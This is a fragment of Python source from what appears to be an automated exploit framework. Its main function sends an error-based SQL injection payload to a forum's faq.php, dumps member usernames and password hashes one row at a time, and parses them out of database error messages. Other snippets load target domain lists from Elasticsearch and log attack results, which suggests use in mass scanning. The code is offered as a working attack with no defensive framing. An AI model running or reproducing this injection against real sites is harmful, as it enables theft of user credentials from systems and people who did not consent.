def exploit(self, url, count=0): self.initialize() httptools = EXPHttp() url = httptools.get_standard_url(url) #拼接漏洞文件 if url[-1] != '/': url = url + '/faq.php' elif url[-1] == '/': url = url + 'faq.php' else: pass table_pre = self.__get_table_pre(url) if not table_pre: return None para = "action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(username,0x20,password) from {table_pre}_members limit {start},1),floor(rand(0)*2))x from information_schema.tables group by x )a)%23".format( table_pre=table_pre, start=count) page_content = self.send_request(url, para) if not page_content: return None pattern = re.compile(r"Duplicate entry '[0,1]?(.*?)[0,1]?'") infos = pattern.findall(page_content) if infos == []: print 'Exploit Failed' return None else: return infos[0].split(' ')
def __init__(self,exploit_file): global file_name self.exp = exploit_file self.es = Elasticsearch('127.0.0.1:9200') self.file = open(file_name,'a') self.file.write('domain_list\t\t\tattack_results\n') self.httptools = EXPHttp()
def __init__(self): self.exp_module = None self.keywords_module = None self.httptools = EXPHttp()